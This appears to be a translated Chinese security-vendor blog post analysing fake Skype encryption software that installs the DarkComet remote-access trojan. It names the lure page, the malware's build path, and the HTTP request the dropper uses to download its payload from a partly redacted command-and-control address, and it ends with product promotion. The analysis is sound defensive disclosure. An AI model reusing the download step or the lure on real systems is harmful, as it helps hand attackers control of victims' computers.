作者：趋势科技资深威胁研究员 Natt Villeneuve

CNN 的报导也侧面证明了有恶意软件正在通过 Skype 传播，这让我们想起另一起以前发现的，会利用 Skype 执行的攻击。

趋势科技发现，有个网页宣称可以提供 Skype 使用的加密软件。这个网页被托管在位于叙利亚的网站 {BLOCKED}encription.sytes.net 上，网站 IP 地址是 {BLOCKED}.{BLOCKED}.{BLOCKED}.0.28。这个地址和之前一些攻击所用的命令与控制服务器完全相同。网页上有个内嵌的 YouTube 视频，声称该软件来自“IT Security Lab（安全实验室）”，可以用来加密 Skype 的语音通讯。

如果用户上当下载该文件，随后即可获得一个据称可以对用户的 Skype 数据进行加密的程序。这个程序为 Skype Encription v2.1.exe，已被趋势科技命名为 BKDR_METEO.HVN。分析后，我们发现没有任何证据表明该程序可以提供所宣称的加密功能。

这个文件中包含的一个字符串证明，文件是由“SyRiAnHaCkErS”所编写的：

C:\Users\SyRiAnHaCkErS\Desktop\test\final\final\obj\x86\Debug\Skype Encription v 2.1.pdb

运行后，该软件会执行下列网络操作：

GET /SkypeEncription/Download/skype.exe HTTP/1.1

Host: {BLOCKED}.{BLOCKED}.0.28

Connection: Keep-Alive

该操作会下载名为 skype.exe 的文件，而该文件已经被确定为 BKDR_ZAPCHAST.HVN，实际上这就是恶意软件 DarkComet 的 3.3 版，该软件会连接到 {BLOCKED}.{BLOCKED}.0.28 这一 IP 地址的 771 端口。在趋势科技的测试环境中，通过对网络通讯进行重定向，确认这实际上就是 DarkComet。

一旦安装 BKDR_ZAPCHAST.HVN，攻击者就可以通过 DarkComet 远程访问木马（RAT）获得被感染系统的完全控制权。关于 DarkComet 远程访问木马的功能已经在这里和这里介绍过了。

请注意，Skype 本身就会使用 AES 加密技术对语音通讯和文字通讯内容进行加密，当然视频通话也受到该技术的保护。

趋势科技的用户无需担心，您已经可以通过趋势科技云计算安全技术获得妥善保护，完全可以检测并清理掉相关恶意软件，预防所有威胁。

@原文出处：Fake Skype Encryption Software Cloaks DarkComet Trojan